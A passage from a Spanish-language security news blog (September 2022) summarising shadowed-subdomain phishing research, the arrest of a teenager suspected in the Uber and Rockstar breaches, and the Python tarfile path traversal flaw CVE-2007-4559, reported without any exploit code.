Los analistas mencionan que VirusTotal marcó solo 200 dominios como maliciosos de los 12.197 dominios descubiertos por Palo Alto.

La mayoría (151) de las detecciones de VirusTotal estaban relacionadas con una única campaña de phishing que utilizaba una red de 649 dominios ocultos en 16 sitios web comprometidos. "Concluimos a partir de estos resultados que esta es una amenaza activa para la empresa y es difícil de detectar sin aprovechar los algoritmos de aprendizaje automático automatizados que pueden analizar grandes cantidades de registros de DNS".

Además, las páginas de phishing alojadas en dominios con buena reputación parecerían confiables para un visitante, lo que aumentaría la probabilidad de que envíe datos en la página.

Seguimiento de la campaña de phishing

La campaña de phishing descubierta por los investigadores de Palo Alto comprometió 16 dominios para crear 649 subdominios, alojando páginas de inicio de sesión falsas o puntos de redirección a páginas de phishing.

Los subdominios que redirigen a los sitios de phishing pueden eludir fácilmente los filtros de seguridad del correo electrónico, ya que no alojan nada malicioso y tienen una reputación benigna.

Los actores de amenazas apuntan a las credenciales de la cuenta de Microsoft y, aunque la URL claramente no está relacionada con Microsoft, no activará advertencias de las herramientas de seguridad de Internet.

En un caso, los propietarios del dominio se dieron cuenta del compromiso, pero no antes de que se crearan numerosos subdominios y facilitaran operaciones maliciosas en su infraestructura.

Si bien la protección contra subdominios no autorizados es responsabilidad de los propietarios de dominios, los registradores y los proveedores de servicios de DNS, sería prudente que los usuarios siempre tuvieran cuidado al enviar datos.

Esto incluye la posibilidad de que un subdominio en un dominio conocido pueda ser malicioso y que los usuarios verifiquen todo dos veces antes de enviar credenciales u otra información confidencial.

Fuente: BC

24 sept 2022

Arrestan al posible atacante de Uber y Rockstar (¿Lapsus$?)

La policía de la ciudad de Londres reveló el viernes que arrestó a un adolescente de 17 años de Oxfordshire bajo sospecha de ataques informáticos. "En la noche del jueves 22 de septiembre de 2022, la policía de la ciudad de Londres arrestó a un joven de 17 años en Oxfordshire bajo sospecha de piratería y el mismo permanece bajo custodia policial".

El departamento dijo que el arresto se realizó como parte de una investigación en asociación con la unidad de delitos cibernéticos de la Agencia Nacional contra el Crimen del Reino Unido.

No se revelaron más detalles sobre la naturaleza de la investigación, aunque se sospecha que la acción policial puede tener algo que ver con la reciente serie de hacks de alto perfil dirigidos a Uber y Rockstar Games.

Se alega que ambas intrusiones fueron cometidas por el mismo actor de amenazas, que se hace llamar Tea Pot (también conocido como teapotuberhacker). Uber, por su parte, ha atribuido la violación a un atacante (o atacantes) que cree que está asociado con la pandilla de extorsión LAPSUS$, dos de los cuales enfrentan cargos por fraude.

Según la empresa de ciberseguridad Flashpoint, se dice que la identidad real del ataque detrás de los dos incidentes se reveló en un foro ilícito en línea. "El administrador de ese foro afirmó que teapotuberhacker era el mismo individuo que supuestamente había pirateado a Microsoft y había tomado el control de Doxbin", reveló la compañía el viernes.

En marzo de este año, BBC News informó sobre un joven de 16 años de Oxford conocido en línea como "White" o "Breachbase", que fue acusado de ser uno de los líderes del grupo LAPSUSU$. Esto también significa que el actor teapotuberhacker es probablemente el mismo que también es conocido por los alias White, Breachbase y WhiteDoxbin y se cree que es el "líder aparente de LAPSUS$".

No está claro de inmediato si estas acusaciones son válidas, pero de ser ciertas, podrían explicar el último arresto por parte de los agentes del orden.

Fuente: THN

22 sept 2022

import tarfile: error de 15 años sin parche en Python

Una vulnerabilidad en el lenguaje de programación Python que se ha pasado por alto durante 15 años ahora vuelve a ser el centro de atención, ya que probablemente afecta a más de 350.000 repositorios de código abierto y puede conducir a la ejecución de código.

Revelado en 2007 y etiquetado como CVE-2007-4559, el problema de seguridad nunca recibió la atención necesaria ni el parche, la única mitigación proporcionada fue una actualización de la documentación que advertía a los desarrolladores sobre el riesgo.

La vulnerabilidad se encuentra en el paquete tarfile de Python, en el código que utiliza la función tarfile.extract() no sanitiazada o en los valores predeterminados integrados de tarfile.extractall(). Es un error de path traversal que permite a un atacante sobrescribir archivos de forma arbitraria.

Los detalles técnicos de CVE-2007-4559 han estado disponibles desde el informe inicial en agosto de 2007. Si bien no hay informes sobre el aprovechamiento del error en los ataques, representa un riesgo en la cadena de suministro de software.

A principios de este año, mientras investigaba otro problema de seguridad, un investigador de Trellix redescubrió CVE-2007-4559

. "Si no se realiza ninguna acción para limpiar los nombres de los archivos antes de solicitar tarfile.extract() o tarfile.extractall(), se genera una vulnerabilidad de path traversal, lo que permite que un actor malintencionado acceda al sistema de archivos" dijo Charles McFarland, investigador de vulnerabilidades en el Equipo de investigación de amenazas avanzadas de Trellix

En 2007, menos de una semana después de la divulgación, un mensaje de Python anunció que el problema estaba solucionado: la solución fue actualizar la documentación con una advertencia "que podría ser peligroso extraer archivos de fuentes no confiables".

Estimación de 350.000 proyectos afectados

Al analizar el impacto, los investigadores de Trellix descubrieron que la vulnerabilidad estaba presente en miles de proyectos de software, tanto de código abierto como cerrado.

Los investigadores rastrearon un conjunto de 257 repositorios con mayor probabilidad de incluir el código vulnerable y verificaron manualmente 175 de ellos para ver si estaban afectados. Esto reveló que el 61% de ellos eran vulnerables. La ejecución de una verificación automatizada en el resto de los repositorios aumentó la cantidad de proyectos afectados al 65%, lo que indica un problema generalizado.

Sin embargo, el pequeño conjunto de muestras solo sirvió como referencia para obtener una estimación de todos los repositorios afectados disponibles en GitHub. "Con la ayuda de GitHub, pudimos obtener un conjunto de datos mucho más grande para incluir 588.840 repositorios únicos que incluyen 'import tarfile' en su código Python" dijo Charles McFarland

Usando la tasa de vulnerabilidad del 61% verificada manualmente, Trellix estima que hay más de 350.000 repositorios vulnerables, muchos de ellos utilizados por herramientas de aprendizaje automático (por ejemplo, GitHub Copilot) que ayudan a los desarrolladores a completar un proyecto más rápido.

En una publicación del blog, el investigador de vulnerabilidades de Trellix, Kasimir Schulz, quien redescubrió el error, describió los pasos simples para explotar CVE-2007-4559 en la versión de Windows de Spyder IDE, un entorno de desarrollo integrado multiplataforma de código abierto para programación científica.

Los investigadores demostraron que la vulnerabilidad también se puede aprovechar en Linux. Lograron escalar la escritura de archivos y lograr la ejecución del código en el producto Polemarch,

Además de llamar la atención sobre la vulnerabilidad y el riesgo que representa, Trellix también creó parches para poco más de 11.000 proyectos. Las correcciones estarán disponibles en un branch del repositorio afectado y se agregarán al proyecto principal a través un pull.

Debido a la gran cantidad de repositorios afectados, los investigadores esperan que más de 70.000 proyectos reciban una solución en las próximas semanas. Sin embargo, alcanzar la marca del 100% es un desafío difícil, ya que los mantenedores también deben aceptar las solicitudes de fusión.

Fuente: BC